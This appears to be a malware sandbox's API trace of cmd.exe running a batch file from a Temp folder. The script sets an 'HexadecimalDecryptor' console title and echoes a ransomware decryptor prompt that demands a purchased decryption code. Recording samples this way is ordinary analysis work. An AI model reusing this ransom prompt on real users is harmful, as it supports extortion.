1 [0128.479] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0128.479] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0128.479] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0128.479] _wcsicmp (_String1="title", _String2="VER") returned -2 [0128.479] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0128.479] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0128.479] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0128.479] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0128.479] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0128.479] ??_V@YAXPEAX@Z () returned 0x1 [0128.479] GetProcessHeap () returned 0x27eb56d0000 [0128.479] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x78) returned 0x27eb56daae0 [0128.479] GetProcessHeap () returned 0x27eb56d0000 [0128.479] RtlReAllocateHeap (Heap=0x27eb56d0000, Flags=0x0, Ptr=0x27eb56daae0, Size=0x44) returned 0x27eb56daae0 [0128.479] GetProcessHeap () returned 0x27eb56d0000 [0128.479] RtlSizeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, MemoryPointer=0x27eb56daae0) returned 0x44 [0128.480] GetProcessHeap () returned 0x27eb56d0000 [0128.480] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x50) returned 0x27eb56dab40 [0128.480] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x9fd6d1e7d8 | out: TokenHandle=0x9fd6d1e7d8*=0x0) returned 0xc000007c [0128.480] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x9fd6d1e7d8 | out: TokenHandle=0x9fd6d1e7d8*=0x98) returned 0x0 [0128.480] NtQueryInformationToken (in: TokenHandle=0x98, TokenInformationClass=0x12, TokenInformation=0x9fd6d1e788, TokenInformationLength=0x4, ReturnLength=0x9fd6d1e790 | out: TokenInformation=0x9fd6d1e788, ReturnLength=0x9fd6d1e790) returned 0x0 [0128.480] NtQueryInformationToken (in: TokenHandle=0x98, TokenInformationClass=0x1a, TokenInformation=0x9fd6d1e790, TokenInformationLength=0x4, ReturnLength=0x9fd6d1e788 | out: TokenInformation=0x9fd6d1e790, ReturnLength=0x9fd6d1e788) returned 0x0 [0128.480] NtClose (Handle=0x98) returned 0x0 [0128.480] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x9fd6d1e7a0, nSize=0x0, Arguments=0x9fd6d1e7a8 | out: lpBuffer="뒰땭ɾ") returned 0xf [0128.481] GetProcessHeap () returned 0x27eb56d0000 [0128.481] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x218) returned 0x27eb56db4e0 [0128.482] SetConsoleTitleW (lpConsoleTitle="Administrator: HexadecimalDecryptor 1.0") returned 1 [0128.536] GetProcessHeap () returned 0x27eb56d0000 [0128.536] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56db4e0) returned 1 [0128.536] LocalFree (hMem=0x27eb56db4b0) returned 0x0 [0128.536] ??_V@YAXPEAX@Z () returned 0x1 [0128.537] _get_osfhandle (_FileHandle=1) returned 0xc [0128.537] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x7) returned 1 [0128.581] _get_osfhandle (_FileHandle=1) returned 0xc [0128.581] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0128.585] _get_osfhandle (_FileHandle=0) returned 0x8 [0128.585] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0128.590] SetConsoleInputExeNameW () returned 0x1 [0128.590] GetConsoleOutputCP () returned 0x1b5 [0128.637] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0128.637] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.644] ??_V@YAXPEAX@Z () returned 0x1 [0128.646] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp\\4ad7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9fd6d1eee8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0128.646] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0128.646] _get_osfhandle (_FileHandle=3) returned 0x94 [0128.646] SetFilePointer (in: hFile=0x94, lDistanceToMove=54, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x36 [0128.646] GetProcessHeap () returned 0x27eb56d0000 [0128.646] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56dab40) returned 1 [0128.646] GetProcessHeap () returned 0x27eb56d0000 [0128.646] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56daae0) returned 1 [0128.646] GetProcessHeap () returned 0x27eb56d0000 [0128.646] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56deaa0) returned 1 [0128.646] GetProcessHeap () returned 0x27eb56d0000 [0128.646] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56d9780) returned 1 [0128.646] GetProcessHeap () returned 0x27eb56d0000 [0128.646] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56daa20) returned 1 [0128.647] _get_osfhandle (_FileHandle=3) returned 0x94 [0128.647] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x36 [0128.647] ReadFile (in: hFile=0x94, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x9fd6d1eea0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x9fd6d1eea0*=0x210, lpOverlapped=0x0) returned 1 [0128.648] SetFilePointer (in: hFile=0x94, lDistanceToMove=93, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5d [0128.648] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=39, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="echo Hexadecimal Ransomware Decryptor\r\n") returned 39 [0128.648] _get_osfhandle (_FileHandle=3) returned 0x94 [0128.648] GetFileType (hFile=0x94) returned 0x1 [0128.648] _get_osfhandle (_FileHandle=3) returned 0x94 [0128.648] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5d [0128.648] GetProcessHeap () returned 0x27eb56d0000 [0128.648] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4012) returned 0x27eb56df1c0 [0128.648] GetProcessHeap () returned 0x27eb56d0000 [0128.648] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56df1c0) returned 1 [0128.648] _wcsicmp (_String1="echo", _String2=")") returned 60 [0128.648] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0128.648] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0128.648] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0128.648] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0128.648] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0128.648] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0128.648] GetProcessHeap () returned 0x27eb56d0000 [0128.648] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xb0) returned 0x27eb56daa20 [0128.648] GetProcessHeap () returned 0x27eb56d0000 [0128.649] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x1a) returned 0x27eb56d9780 [0128.649] GetProcessHeap () returned 0x27eb56d0000 [0128.649] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x54) returned 0x27eb56daae0 [0128.650] _tell (_FileHandle=3) returned 93 [0128.650] _close (_FileHandle=3) returned 0 [0128.650] malloc (_Size=0xffce) returned 0x27eb5900160 [0128.652] ??_V@YAXPEAX@Z () returned 0x27eb5900160 [0128.652] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0128.652] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0128.652] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0128.652] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0128.652] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0128.652] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0128.652] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0128.652] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0128.652] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0128.653] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0128.653] GetConsoleTitleW (in: lpConsoleTitle=0x9fd6d1ec90, nSize=0x104 | out: lpConsoleTitle="Administrator: HexadecimalDecryptor 1.0") returned 0x29 [0128.655] malloc (_Size=0xffce) returned 0x27eb5910140 [0128.655] ??_V@YAXPEAX@Z () returned 0x27eb5910140 [0128.656] malloc (_Size=0xffce) returned 0x27eb5920120 [0128.656] ??_V@YAXPEAX@Z () returned 0x27eb5920120 [0128.656] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0128.656] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0128.656] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0128.656] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0128.656] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0128.656] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0128.656] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0128.656] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0128.656] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0128.656] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0128.656] ??_V@YAXPEAX@Z () returned 0x1 [0128.657] GetProcessHeap () returned 0x27eb56d0000 [0128.657] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x98) returned 0x27eb56db4b0 [0128.657] GetProcessHeap () returned 0x27eb56d0000 [0128.657] RtlReAllocateHeap (Heap=0x27eb56d0000, Flags=0x0, Ptr=0x27eb56db4b0, Size=0x54) returned 0x27eb56db4b0 [0128.657] GetProcessHeap () returned 0x27eb56d0000 [0128.657] RtlSizeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, MemoryPointer=0x27eb56db4b0) returned 0x54 [0128.657] GetProcessHeap () returned 0x27eb56d0000 [0128.657] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x5e) returned 0x27eb56db520 [0128.657] _vsnwprintf (in: _Buffer=0x7ff67b917f60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x9fd6d1ea18 | out: _Buffer="Hexadecimal Ransomware Decryptor\r\n") returned 34 [0128.657] _get_osfhandle (_FileHandle=1) returned 0xc [0128.657] GetFileType (hFile=0xc) returned 0x2 [0128.657] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0128.657] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x9fd6d1e9a8 | out: lpMode=0x9fd6d1e9a8) returned 1 [0128.663] _get_osfhandle (_FileHandle=1) returned 0xc [0128.663] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x7ff67b917f60*, nNumberOfCharsToWrite=0x22, lpNumberOfCharsWritten=0x9fd6d1e9e8, lpReserved=0x0 | out: lpBuffer=0x7ff67b917f60*, lpNumberOfCharsWritten=0x9fd6d1e9e8*=0x22) returned 1 [0128.667] ??_V@YAXPEAX@Z () returned 0x1 [0128.667] _get_osfhandle (_FileHandle=1) returned 0xc [0128.667] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x7) returned 1 [0128.670] _get_osfhandle (_FileHandle=1) returned 0xc [0128.670] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0128.685] _get_osfhandle (_FileHandle=0) returned 0x8 [0128.685] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0128.717] SetConsoleInputExeNameW () returned 0x1 [0128.717] GetConsoleOutputCP () returned 0x1b5 [0128.814] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0128.814] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.853] ??_V@YAXPEAX@Z () returned 0x1 [0128.854] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp\\4ad7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9fd6d1eee8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0128.855] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0128.855] _get_osfhandle (_FileHandle=3) returned 0x94 [0128.855] SetFilePointer (in: hFile=0x94, lDistanceToMove=93, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5d [0128.855] GetProcessHeap () returned 0x27eb56d0000 [0128.855] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56db520) returned 1 [0128.855] GetProcessHeap () returned 0x27eb56d0000 [0128.855] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56db4b0) returned 1 [0128.855] GetProcessHeap () returned 0x27eb56d0000 [0128.855] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56daae0) returned 1 [0128.855] GetProcessHeap () returned 0x27eb56d0000 [0128.855] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56d9780) returned 1 [0128.855] GetProcessHeap () returned 0x27eb56d0000 [0128.855] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56daa20) returned 1 [0128.855] _get_osfhandle (_FileHandle=3) returned 0x94 [0128.855] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5d [0128.855] ReadFile (in: hFile=0x94, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x9fd6d1eea0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x9fd6d1eea0*=0x1e9, lpOverlapped=0x0) returned 1 [0128.856] SetFilePointer (in: hFile=0x94, lDistanceToMove=95, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5f [0128.856] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=2, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="\r\nho Hexadecimal Ransomware Decryptor\r\n") returned 2 [0128.856] _get_osfhandle (_FileHandle=3) returned 0x94 [0128.856] GetFileType (hFile=0x94) returned 0x1 [0128.856] _get_osfhandle (_FileHandle=3) returned 0x94 [0128.856] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f [0128.856] GetProcessHeap () returned 0x27eb56d0000 [0128.856] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4012) returned 0x27eb56df1c0 [0128.856] GetProcessHeap () returned 0x27eb56d0000 [0128.856] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56df1c0) returned 1 [0128.856] _tell (_FileHandle=3) returned 95 [0128.856] _close (_FileHandle=3) returned 0 [0128.856] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp\\4ad7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9fd6d1eee8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0128.857] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0128.857] _get_osfhandle (_FileHandle=3) returned 0x94 [0128.857] SetFilePointer (in: hFile=0x94, lDistanceToMove=95, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5f [0128.857] _get_osfhandle (_FileHandle=3) returned 0x94 [0128.857] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f [0128.857] ReadFile (in: hFile=0x94, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x9fd6d1eea0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x9fd6d1eea0*=0x1e7, lpOverlapped=0x0) returned 1 [0128.857] SetFilePointer (in: hFile=0x94, lDistanceToMove=119, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x77 [0128.857] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=24, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="echo Hello! %username%\r\nare Decryptor\r\n") returned 24 [0128.857] _get_osfhandle (_FileHandle=3) returned 0x94 [0128.857] GetFileType (hFile=0x94) returned 0x1 [0128.857] _get_osfhandle (_FileHandle=3) returned 0x94 [0128.857] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x77 [0128.857] GetProcessHeap () returned 0x27eb56d0000 [0128.857] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4012) returned 0x27eb56df1c0 [0128.858] GetProcessHeap () returned 0x27eb56d0000 [0128.858] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4010) returned 0x27eb56f6b30 [0128.860] GetProcessHeap () returned 0x27eb56d0000 [0128.860] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x22) returned 0x27eb56d9780 [0128.860] GetEnvironmentVariableW (in: lpName="username", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="FD1HVy") returned 0x6 [0128.860] GetProcessHeap () returned 0x27eb56d0000 [0128.860] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56d9780) returned 1 [0128.860] GetProcessHeap () returned 0x27eb56d0000 [0128.860] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56f6b30) returned 1 [0128.861] GetProcessHeap () returned 0x27eb56d0000 [0128.861] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56df1c0) returned 1 [0128.861] _wcsicmp (_String1="echo", _String2=")") returned 60 [0128.861] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0128.861] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0128.861] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0128.861] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0128.861] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0128.861] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0128.861] GetProcessHeap () returned 0x27eb56d0000 [0128.861] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xb0) returned 0x27eb56daa20 [0128.861] GetProcessHeap () returned 0x27eb56d0000 [0128.861] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x1a) returned 0x27eb56d9780 [0128.862] GetProcessHeap () returned 0x27eb56d0000 [0128.862] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x2e) returned 0x27eb56daae0 [0128.862] _tell (_FileHandle=3) returned 119 [0128.862] _close (_FileHandle=3) returned 0 [0128.863] malloc (_Size=0xffce) returned 0x27eb5900160 [0128.864] ??_V@YAXPEAX@Z () returned 0x27eb5900160 [0128.864] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0128.864] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0128.864] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0128.864] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0128.864] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0128.864] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0128.864] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0128.864] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0128.864] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0128.864] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0128.865] GetConsoleTitleW (in: lpConsoleTitle=0x9fd6d1ec90, nSize=0x104 | out: lpConsoleTitle="Administrator: HexadecimalDecryptor 1.0") returned 0x29 [0128.893] malloc (_Size=0xffce) returned 0x27eb5910140 [0128.893] ??_V@YAXPEAX@Z () returned 0x27eb5910140 [0128.894] malloc (_Size=0xffce) returned 0x27eb5920120 [0128.894] ??_V@YAXPEAX@Z () returned 0x27eb5920120 [0128.894] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0128.894] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0128.894] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0128.894] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0128.895] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0128.895] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0128.895] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0128.895] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0128.895] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0128.895] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0128.895] ??_V@YAXPEAX@Z () returned 0x1 [0128.895] GetProcessHeap () returned 0x27eb56d0000 [0128.895] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4c) returned 0x27eb56dab20 [0128.895] GetProcessHeap () returned 0x27eb56d0000 [0128.895] RtlReAllocateHeap (Heap=0x27eb56d0000, Flags=0x0, Ptr=0x27eb56dab20, Size=0x2e) returned 0x27eb56dab20 [0128.895] GetProcessHeap () returned 0x27eb56d0000 [0128.895] RtlSizeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, MemoryPointer=0x27eb56dab20) returned 0x2e [0128.896] GetProcessHeap () returned 0x27eb56d0000 [0128.896] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x38) returned 0x27eb56dab60 [0128.896] _vsnwprintf (in: _Buffer=0x7ff67b917f60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x9fd6d1ea18 | out: _Buffer="Hello! FD1HVy\r\n") returned 15 [0128.896] _get_osfhandle (_FileHandle=1) returned 0xc [0128.896] GetFileType (hFile=0xc) returned 0x2 [0128.896] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0128.896] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x9fd6d1e9a8 | out: lpMode=0x9fd6d1e9a8) returned 1 [0128.918] _get_osfhandle (_FileHandle=1) returned 0xc [0128.918] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x7ff67b917f60*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x9fd6d1e9e8, lpReserved=0x0 | out: lpBuffer=0x7ff67b917f60*, lpNumberOfCharsWritten=0x9fd6d1e9e8*=0xf) returned 1 [0128.980] ??_V@YAXPEAX@Z () returned 0x1 [0128.981] _get_osfhandle (_FileHandle=1) returned 0xc [0128.982] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x7) returned 1 [0129.062] _get_osfhandle (_FileHandle=1) returned 0xc [0129.062] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0129.108] _get_osfhandle (_FileHandle=0) returned 0x8 [0129.108] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0129.490] SetConsoleInputExeNameW () returned 0x1 [0129.490] GetConsoleOutputCP () returned 0x1b5 [0129.610] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0129.610] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.771] ??_V@YAXPEAX@Z () returned 0x1 [0129.774] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp\\4ad7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9fd6d1eee8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0129.774] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0129.774] _get_osfhandle (_FileHandle=3) returned 0x94 [0129.774] SetFilePointer (in: hFile=0x94, lDistanceToMove=119, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x77 [0129.775] GetProcessHeap () returned 0x27eb56d0000 [0129.775] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56dab60) returned 1 [0129.775] GetProcessHeap () returned 0x27eb56d0000 [0129.775] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56dab20) returned 1 [0129.775] GetProcessHeap () returned 0x27eb56d0000 [0129.775] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56daae0) returned 1 [0129.775] GetProcessHeap () returned 0x27eb56d0000 [0129.775] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56d9780) returned 1 [0129.775] GetProcessHeap () returned 0x27eb56d0000 [0129.775] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56daa20) returned 1 [0129.775] _get_osfhandle (_FileHandle=3) returned 0x94 [0129.775] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x77 [0129.775] ReadFile (in: hFile=0x94, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x9fd6d1eea0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x9fd6d1eea0*=0x1cf, lpOverlapped=0x0) returned 1 [0129.775] SetFilePointer (in: hFile=0x94, lDistanceToMove=171, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xab [0129.776] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=52, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="echo Enter the decryption code you have purchased!\r\n") returned 52 [0129.776] _get_osfhandle (_FileHandle=3) returned 0x94 [0129.776] GetFileType (hFile=0x94) returned 0x1 [0129.776] _get_osfhandle (_FileHandle=3) returned 0x94 [0129.776] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xab [0129.776] GetProcessHeap () returned 0x27eb56d0000 [0129.776] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4012) returned 0x27eb56df1c0 [0129.776] GetProcessHeap () returned 0x27eb56d0000 [0129.776] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56df1c0) returned 1 